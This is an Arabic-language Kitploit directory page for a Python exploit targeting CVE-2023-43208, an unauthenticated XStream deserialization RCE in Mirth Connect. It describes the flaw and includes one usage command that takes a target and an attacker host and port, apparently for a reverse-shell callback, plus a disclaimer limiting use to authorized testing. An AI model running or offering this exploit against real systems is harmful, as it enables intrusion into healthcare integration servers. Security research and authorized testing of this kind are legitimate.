Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Mirth-Connect-CVE-2023-43208 — استغلال Python لثغرة CVE-2023-43208 في Mirth Connect (تنفيذ أوامر عن بُعد بدون مصادقة عبر XStream) | Kitploit
أدوات/GitHubGitHub/azrvs/mirth-connect-cve-2023-43208
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHubazrvs/mirth-connect-cve-2023-43208

Mirth-Connect-CVE-2023-43208

استغلال Python لثغرة CVE-2023-43208 في Mirth Connect (تنفيذ أوامر عن بُعد بدون مصادقة عبر XStream)

عرض المستودع
2منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-43208: تنفيذ التعليمات البرمجية عن بُعد (RCE) غير المصادق عليه في NextGen Mirth Connect

Python Version Vulnerability

يستغل هذا الاستغلال ثغرة إلغاء تسلسل حرجة داخل محرك XStream في Mirth Connect. وينبع ذلك من تصحيح غير مكتمل لـ CVE-2023-37679، مما يتيح تنفيذ تعليمات برمجية عشوائية غير مصادق عليها عبر جميع الإصدارات السابقة لـ 4.4.1.

الاستخدام

root@kitploit:~
python3 mirth_rce.py https://{target} <attacker_host> <attacker_port>

إخلاء المسؤولية

تهدف هذه الأداة الاستغلالية حصريًا إلى الأغراض التعليمية والتدقيق الأمني المصرح به لمساعدة المدافعين في التخفيف من CVE-2023-43208؛ أي استخدام لهذه الأداة ضد أهداف غير مصرح بها يعد غير قانوني ويقع على عاتق المستخدم النهائي وحده. يقدم المؤلف هذا البرنامج "كما هو" دون أي ضمانات، ويتنصل من جميع المسؤوليات عن أي إساءة استخدام أو أضرار محتملة، ولا يوافق أو يشجع على الأنشطة غير المصرح بها. استخدمه على مسؤوليتك الخاصة وفقط بما يتوافق مع القوانين المعمول بها.

تنزيل الأداة